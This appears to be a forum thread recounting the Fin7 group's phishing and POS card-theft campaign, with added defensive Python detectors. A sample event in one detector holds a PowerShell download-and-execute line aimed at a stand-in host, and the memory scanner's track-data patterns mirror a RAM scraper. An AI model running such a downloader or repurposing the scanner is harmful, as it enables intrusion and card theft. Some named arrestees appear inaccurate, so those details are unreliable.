Mutt
How carders stole 15 million credit cards from restaurants.
This thread tells the shocking story of one of the most dangerous carding groups in the world: Fin7. How did they manage to hack restaurants and cafes and steal 15 million bank cards around the world? Who was behind the attacks? Why did even McDonald's and Chili's come under attack? And how did the FBI get on the criminals' trail?
We examined:
- Methods of hacking POS terminals
- How hackers disguised themselves as an IT company
- Who led the operation
- Why Fin7 are still dangerous
Contents:
- Introduction: a common situation and unexpected consequences
- Who are Fin7
- The scale of the attacks and the affected chains
- 15 million cards and a billion in losses
- Spring 2015: the first signs of an attack
- Anomalies in POS terminals, a strange .doc file
- A chain of companies with identical symptoms
- Malicious code analysis
- Stealth, encryption, updates
- FireEye and Trustwave begin the investigation
- First lead: an IP address in Ukraine
- Communication with a remote server; surveillance begins
- Mechanics of the attacks: advanced phishing
- Emails from HR, accounting, tenders
- Volume, precision, project-like management
- February 2017: the Arby's breach and the emergence of the name Fin7
- 355,000 cards
- FIN7 is an internal name from analysts
- Dmitry Fedorov (Aqua): a key figure
- Coordination, management, training of employees
- Combi Security: cover by a legitimate-looking company
- Website, job openings, recruitment of developers via LinkedIn
- Developers did not know they were working for hackers
- Fin7 as an IT startup
- Roles: developers, marketers, engineers, managers
- Distribution of tasks and reporting
- Tools and disguise
- Carbanak, BATELEUR, PowerShell, PDF, JPEG
- Encryption, bypassing antivirus
- Why the scheme worked
- The weak link is a person
- Good English, plausible emails
- Example of an attack: infection via a Word document
- Spear phishing, company research
- Macros, exploits, software installation
- What was stolen and where it went
- Name, number, expiration date, CVV
- Fin7 storage
- Scale of the damage
- 100+ companies, 6,500 terminals, $1 billion in losses
- Sale of cards on the darknet at $10–50 per card, cashing out, equipment, online shopping
- Concealment methods
- Tor, proxies, VPN, self-destruction, constantly changing code
- Slip-up #1: a Ukrainian IP and associated domains
- Operator error; shared templates; the administrator's e-mail
- Slip-up #2: correspondence leak
- Salaries, IPs, Excel files with cards: evidence for the FBI
- Others arrested: Bogachev, Kolpakov, freelancers
- Cooperation with the investigation
- Consequences
- 10+ arrests, server seizures
- Fin7 as a structure disappears; members move to other groups
You go to McDonald's after work, buy yourself something to eat and pay by card. A week later your bank blocks the card: someone has just bought a laptop with your money.
Meet the Fin7 group. They are associated with Ukraine because of the IP addresses they used, but citizens of other countries, Russia among them, may also have been part of the group; the nationality of all the participants has not been confirmed. They created shell companies and hired developers through LinkedIn.
And they harvested, in enormous quantities, something we all carry in our wallets: payment cards. At the peak of their activity they had access to thousands of POS terminals across America. They had their own accounting department and even an HR department. They acted like an IT company but worked like the mafia. In total, over 15 million cards and damages exceeding one billion dollars, all without a single bank being hacked.
Only restaurants, only phishing. Spring 2015. The IT department of one US restaurant chain sounded the alarm: POS terminals had begun to behave strangely. Transactions were delayed, unknown processes appeared, systems rebooted for no reason. The security team found a strange file on one of the systems. It looked like an ordinary .doc file, but opening it activated malicious code.
An internal investigation began. A few weeks later another company reported a similar anomaly. Then another, and another: Chipotle, Jason's Deli, Red Robin. Customers of these chains began to complain en masse about fraudulent charges on their cards after an ordinary lunch or dinner. What did the experts see? The code infecting the POS systems was sophisticated: it knew how to hide, it encrypted its traffic, and it was regularly updated.
That was when FireEye researchers began to suspect they were dealing not with a lone carder but with a group that had serious resources. The first lead came from one of the samples: the malware contacted a remote command-and-control server whose IP address was geolocated to Ukraine. That was the first clue pointing to the source of the attack. On the surface it looked like just another phishing campaign. The mechanics were banal: the victim received an email with an attachment, supposedly from accounting, from HR, or about a tender.
The file was opened and the system was infected. But the scale and consistency of the attacks were alarming. The same malware turned up in dozens of companies. The senders were perfectly disguised as partners or contractors. The attacks came in waves, as if on a schedule. Someone was running the attacks as a project: distributing tasks, setting deadlines and checking results. The turning point was Arby's, in February 2017.
The Arby's restaurant chain officially reported that the breach had compromised the data of around 355,000 customer cards. After this incident the investigation was given the name "Fin7". It is an internal designation from the analysts: "FIN" denotes a financially motivated threat group, and "7" means it was the seventh such investigation by the company. The name stuck in the media and in intelligence reports. But at the time nobody knew how deep the group's roots went.
In 2018 the FBI identified one of the key coordinators. Dmitry Fedorov is a citizen of Ukraine; in some documents he appears under the carder handle "Aqua". He did not just write code: he ran the structure, coordinated attacks, trained personnel and monitored the quality of task execution. The most interesting thing is that Fin7 operated under the cover of a seemingly legitimate company. They created Combi Security, supposedly a lawful provider of IT services, complete with a website, corporate email and job openings.
Developers were hired remotely through LinkedIn, freelance sites and Upwork. They were asked to write scripts without being told that those scripts were part of phishing attacks; many employees did not even know they were working for a carding group. Fin7 resembled a startup. Developers created phishing documents tailored to each target. "Marketers" prepared mailings on behalf of accounting departments, HR departments and even government agencies. Engineers tested the malware in a sandbox before releasing it into a real network.
Managers tracked progress against goals, sent deadline reminders and compiled reports. Everyone had their own area of responsibility. Then there was debugging and adaptation: Fin7 constantly upgraded their tools. The most famous is Carbanak, later supplemented by their own forks tailored to POS environments. They disguised malware as Word documents, PDFs and even JPEGs, used legitimate Windows tools such as PowerShell to hide their activity, built in antivirus evasion and encrypted their traffic to stay invisible.
Once infection occurred, live operators took over. They established reverse shell connections, the technique in which the malware on the victim's computer connects outward to the attacker's server so that the attacker gains remote access without any inbound firewall rule. They installed additional utilities and began searching for the files they needed, in particular databases containing card numbers. Sometimes an infection lasted for days or weeks; they were in no hurry.
The main thing was to remain unnoticed. Why did it work? Fin7 knew that the weakest link in any system is a person. They relied on social engineering: fake emails written in good English with a credible structure, sent at volume. They could send out thousands of infected emails at a time. Imagine you manage a chain of restaurants. You have dozens of terminals, POS systems connected to a local network.
And one day one of the employees opens an email titled "Invoice for the delivery of vegetables. Urgent payment." The attachment is a Word document. It opens, and nothing happens, at first glance. But at that moment malware is already living inside the system: small, almost invisible, like a spy. The main method was spear phishing, a targeted attack. Fin7 did not just send spam; they studied the target: the company name, the full names of employees, partners and suppliers, the style of internal correspondence.
The emails came from realistic-looking senders, and people opened them without a second thought. Once the document was opened, a script ran, for example via a malicious Word macro or a Windows vulnerability, and one of Fin7's tools was installed. BATELEUR is a lightweight scripted backdoor; Carbanak is a full-featured remote access trojan (RAT). Additional plugins, keyloggers, password dumpers and sniffers gave Fin7 full control over the infected machine.
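The infection chain just described (Word document, macro, script host, download of the real payload) leaves a very recognisable trace in process-creation telemetry: an Office application as the parent of PowerShell, usually with an encoded command line. The following is an added detection example, written for this thread rather than taken from Fin7's tooling or from any vendor product; the event fields (host, pid, image, parent_image, cmdline) are assumed to come from Sysmon Event ID 1 or equivalent, and the sample events are constructed, not real logs.

```python
import base64
import binascii
import re
from dataclasses import dataclass

# Parents that should never spawn a script host on a POS or back-office machine.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Children that a malicious macro typically launches to fetch the next stage.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...);
# the loose pattern also catches "-ep bypass", so every candidate is test-decoded.
ENC_ARG = re.compile(r"(?i)(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]+)")


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 style; field names are assumed)."""
    host: str
    pid: int
    image: str
    parent_image: str
    cmdline: str


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the cleartext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    for m in ENC_ARG.finditer(cmdline):
        try:
            return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not a real encoded command (e.g. the "bypass" of "-ep bypass")
    return None


def analyze(events):
    """Flag Office -> script-host chains and decode hidden PowerShell commands."""
    findings = []
    for ev in events:
        child, parent = basename(ev.image), basename(ev.parent_image)
        reasons = []
        if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
            reasons.append(f"office-to-script-host: {parent} -> {child}")
        if child in {"powershell.exe", "pwsh.exe"}:
            decoded = decode_encoded_command(ev.cmdline)
            if decoded is not None:
                reasons.append(f"encoded PowerShell command: {decoded}")
        if reasons:
            findings.append({"host": ev.host, "pid": ev.pid, "reasons": reasons})
    return findings


def build_encoded_ps(command: str) -> str:
    """Encode a command the way a 'powershell -enc' argument is built (UTF-16LE, base64)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry, not real logs: a Word document opened on a back-office
# host spawns a hidden, encoded PowerShell downloader, amid benign noise.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
SAMPLE_EVENTS = [
    ProcEvent("POS-BACKOFFICE-01", 4120,
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\explorer.exe",
              r'"WINWORD.EXE" /n "C:\Users\front\Downloads\Invoice_vegetables.doc"'),
    ProcEvent("POS-BACKOFFICE-01", 4388,
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              "powershell.exe -NoP -W Hidden -ep bypass -enc " + build_encoded_ps(STAGE2)),
    ProcEvent("POS-BACKOFFICE-01", 5012, r"C:\Windows\System32\notepad.exe",
              r"C:\Windows\explorer.exe", "notepad.exe"),
    ProcEvent("POS-BACKOFFICE-02", 2210, r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\explorer.exe", "cmd.exe /c dir"),
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f['host']}] pid {f['pid']}: " + "; ".join(f["reasons"]))
```

The parent-child rule is the durable part: the macro text, the file name and the download host change from campaign to campaign, but a document viewer launching a script host almost never happens in a restaurant's normal workflow, so the rule stays cheap and low-noise. Decoding the encoded command is what turns the alert into something an analyst can act on immediately.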
The main target was the POS terminals, the systems that customers' bank cards pass through. Fin7 got into the local network, scanned for the POS systems, and installed a RAM scraper on them: a program that reads card data straight out of the payment application's memory as each transaction is processed. Why from memory? Because even where card data is encrypted on disk and on the wire, on many POS systems it sits in cleartext in RAM for a moment while the transaction is processed. The exception is point-to-point encryption performed inside the card reader itself, which leaves the application, and any scraper running beside it, with nothing readable.
That window is what Fin7 exploited. What did they steal? The cardholder's name, the card number, the expiry date, the CVV where it was accessible, plus the location and name of the restaurant. This data flowed into centralized storage that Fin7 carefully disguised.
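A RAM scraper is nothing more than a pattern search over process memory: track 1 and track 2 data have a fixed layout, and a Luhn check separates real card numbers from random digit runs. The same logic is what a defender runs over a memory dump of the payment application to prove whether cleartext track data is exposed at all (if the card reader does point-to-point encryption, the scan comes back empty). The block below is an added example for this thread, not Fin7's scraper or any vendor's tool; the memory image is constructed inline and the card numbers are the public Visa and Mastercard test numbers, and unlike a scraper it masks what it finds.

```python
import re

# Magnetic-stripe layouts as they appear in a payment application's memory.
# Track 1: %B<PAN>^<SURNAME/FIRST>^<YYMM><service code><discretionary>?
# Track 2: ;<PAN>=<YYMM><service code><discretionary>?
TRACK1 = re.compile(rb"%B(\d{13,19})\^([A-Z /.'-]{2,26})\^(\d{2})(\d{2})(\d{3})[^?]{0,60}\?")
TRACK2 = re.compile(rb";(\d{13,19})=(\d{2})(\d{2})(\d{3})[^?]{0,40}\?")


def luhn_ok(pan: str) -> bool:
    """Luhn check-digit validation; filters out digit runs that merely look like PANs."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def mask(pan: str) -> str:
    """Keep the BIN and the last four digits, as a report (unlike a scraper) should."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def scan_memory(buf: bytes):
    """Locate Luhn-valid track data in a raw memory image and return masked findings."""
    hits = []
    for m in TRACK1.finditer(buf):
        pan = m.group(1).decode("ascii")
        if luhn_ok(pan):
            hits.append({"track": 1, "offset": m.start(), "pan": mask(pan),
                         "name": m.group(2).decode("ascii").strip(),
                         "expiry": m.group(4).decode("ascii") + "/" + m.group(3).decode("ascii")})
    for m in TRACK2.finditer(buf):
        pan = m.group(1).decode("ascii")
        if luhn_ok(pan):
            hits.append({"track": 2, "offset": m.start(), "pan": mask(pan),
                         "expiry": m.group(3).decode("ascii") + "/" + m.group(2).decode("ascii")})
    return sorted(hits, key=lambda h: h["offset"])


# Constructed process dump (not a real capture). PANs are the public Visa/Mastercard
# test numbers; the third record fails the Luhn check and must be ignored.
SAMPLE_DUMP = (
    b"\x00" * 32
    + b"POSAPP v4.2 txn buffer "
    + b"%B5555555555554444^DOE/JOHN^29121010000000000000?"   # Track 1, valid
    + b"\x00\xff" * 8
    + b";4111111111111111=2912101123456789?"                 # Track 2, valid
    + b"\x00" * 5
    + b";4111111111111112=2912101123456789?"                 # Track 2, bad check digit
    + b"\x00" * 16
)

if __name__ == "__main__":
    for h in scan_memory(SAMPLE_DUMP):
        print(h)
```

Running this against a dump of the real payment process (taken with the usual memory acquisition tools) is the quickest way to answer the question every restaurant chain in this story should have asked: is there anything in memory worth scraping?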
According to the US Department of Justice (DOJ), more than a hundred companies suffered, six and a half thousand POS terminals were infected, more than fifteen million cards were stolen, and the losses of companies and banks exceeded one billion dollars, all of it over three years in the background, without shootouts, bank heists or robberies. Then the other part of Fin7, their partners on the darknet, came into play. The cards were sold on forums and shops such as Joker's Stash and CarderPlanet. The average price ranged from $10 to $50 per card, depending on the type and balance. The buyers were cash-out operators. The cards were used to buy electronics for resale, to withdraw cash, and to order from online stores, especially in countries with weak anti-fraud systems.
Fin7 hid their actions skillfully. They used Tor, proxies and VPNs, and built self-destruct timers into the malware. The program code changed constantly, so that antivirus vendors could not keep up. An entire operation could run for weeks while the victim noticed nothing. This was not an attack; it was an occupation.
Fin7 were sure they were elusive, protected by VPNs, fake companies and the anonymity of the darknet. But, as usually happens, they made mistakes. Slip-up number one: reused IPs and domains. Fin7 disguised themselves carefully, but in one attack the operator did not switch proxies, and the IP that connected to the malware's control panel turned out to be Ukrainian. Later, related domains were found, registered to fictitious persons but built from the same templates.
One of the servers was hosted in the USA, and through it investigators reached the administrator's email. Slip-up number two: the correspondence leak. One of the FireEye analysts gained access to Fin7's internal correspondence, which discussed developers' salaries, task status, IPs, addresses and passwords, and even files containing the stolen cards. This trove became key evidence for the FBI.
In 2018 Dmitry Fedorov, "Aqua", the Fin7 coordinator and project manager, was detained in Europe in an operation involving the FBI and Europol. Fedorov was extradited to the United States. During questioning he did not admit guilt, but the investigation already had tens of gigabytes of evidence. Soon after, Fedor Bogachev was arrested (not to be confused with the author of Zeus, a namesake), an IT specialist who wrote scripts for BATELEUR. Andrey Kolpakov, a technical lead, managed several teams within Combi Security.
Several Ukrainian freelancers hired through Upwork did not even suspect they were writing malware. Some Fin7 members cooperated with the investigation in exchange for reduced sentences. In total, more than ten key participants were eventually arrested. Fin7 largely ceased to exist as an organization, but some of its members later surfaced in other groups: REvil, DarkSide, Black Basta.
Ukraine's cybersecurity service officially took part in the operation, with searches and interrogations inside the country. In 2022 a group with a similar structure was observed resuming phishing attacks on restaurants and hotels in the United States. Their tooling looked painfully familiar: macro-laden documents, the same Trojans, the same lateral movement techniques. In simple terms, lateral movement is like a thief who breaks into one house in a neighbourhood and then looks for ways into the neighbouring houses, over shared fences or through windows.
On a network, a hacker or carder uses stolen passwords, software vulnerabilities or trusted internal connections to reach more valuable targets. Experts have suggested that this could be a reincarnation of Fin7 or the work of its former members.
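Lateral movement from the first infected back-office machine to every POS terminal on the LAN is what turns one phished employee into six and a half thousand infected terminals, and it has a simple signature in Windows logon telemetry: one account from one source address authenticating over the network (logon type 3) to many distinct hosts in a short time. The block below is an added example for this thread, not Fin7's tooling or any product's rule; it assumes the logs have been flattened to CSV with the columns shown, and the sample lines are constructed, not real events.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Windows logon telemetry (not real logs), flattened to CSV:
# timestamp,event_id,logon_type,account,source_ip,target_host
# 4624 = successful logon; logon type 3 = network logon (SMB, WMI, PsExec-style access).
SAMPLE_LOG = """\
2017-02-03T02:10:12Z,4624,2,jdoe,10.10.7.40,WS-FRONT-03
2017-02-03T02:12:01Z,4624,3,svc_pos,10.10.5.23,POS-01
2017-02-03T02:12:09Z,4624,3,svc_pos,10.10.5.23,POS-02
2017-02-03T02:12:15Z,4624,3,svc_pos,10.10.5.23,POS-03
2017-02-03T02:12:22Z,4624,3,svc_pos,10.10.5.23,POS-04
2017-02-03T02:12:31Z,4624,3,svc_pos,10.10.5.23,POS-05
2017-02-03T02:12:40Z,4624,3,svc_pos,10.10.5.23,POS-06
2017-02-03T02:30:00Z,4624,3,backup,10.10.1.9,FILESRV-01
2017-02-03T02:45:00Z,4625,3,jdoe,10.10.7.40,FILESRV-01
2017-02-03T03:30:00Z,4624,3,backup,10.10.1.9,FILESRV-02
"""


def parse_log(text: str):
    """Parse the CSV lines above into event dicts with real datetimes."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, logon_type, account, src_ip, target = line.split(",")
        events.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "event_id": int(event_id),
            "logon_type": int(logon_type),
            "account": account,
            "src_ip": src_ip,
            "target": target,
        })
    return events


def detect_fanout(events, min_hosts=4, window=timedelta(minutes=10)):
    """Alert when one (account, source IP) reaches >= min_hosts distinct hosts over the network within window."""
    by_actor = defaultdict(list)
    for ev in events:
        if ev["event_id"] == 4624 and ev["logon_type"] == 3:  # successful network logons only
            by_actor[(ev["account"], ev["src_ip"])].append(ev)

    alerts = []
    for (account, src_ip), evs in by_actor.items():
        evs.sort(key=lambda e: e["ts"])
        for i, start in enumerate(evs):          # sliding window anchored at each logon
            hosts = {start["target"]}
            for later in evs[i + 1:]:
                if later["ts"] - start["ts"] > window:
                    break
                hosts.add(later["target"])
            if len(hosts) >= min_hosts:
                alerts.append({"account": account, "src_ip": src_ip,
                               "first_seen": start["ts"], "hosts": sorted(hosts)})
                break                            # one alert per actor is enough
    return alerts


if __name__ == "__main__":
    for a in detect_fanout(parse_log(SAMPLE_LOG)):
        print(f"{a['account']}@{a['src_ip']} reached {len(a['hosts'])} hosts "
              f"from {a['first_seen']}: {', '.join(a['hosts'])}")
```

The thresholds are deliberately parameters: a backup service account legitimately touching two file servers an hour apart should not fire, while a single account sweeping six POS hosts in under a minute should, and the right numbers depend on how flat the restaurant's network is. Segmenting the POS VLAN from the back office, so that the first hop is impossible rather than merely visible, is the control the detection is meant to back up, not replace.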